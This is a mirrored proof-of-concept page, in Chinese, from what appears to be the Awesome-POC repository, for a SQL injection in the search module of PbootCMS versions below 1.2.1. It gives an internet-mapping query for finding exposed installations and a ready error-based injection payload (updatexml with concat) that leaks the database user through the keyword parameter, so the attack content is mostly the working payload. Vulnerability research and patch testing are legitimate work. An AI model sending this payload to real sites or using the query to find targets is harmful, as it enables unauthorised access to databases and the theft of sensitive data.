mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 19:38:09 +00:00
29 lines
548 B
Markdown
29 lines
548 B
Markdown
# PbootCMS search SQL注入漏洞
|
|
|
|
## 漏洞描述
|
|
|
|
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
PbootCMS < 1.2.1
|
|
```
|
|
|
|
## 网络测绘
|
|
|
|
```
|
|
app="PBOOTCMS"
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
搜索框页面为
|
|
|
|
Payload为
|
|
|
|
```plain
|
|
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
|
|
```
|
|
|
|
 |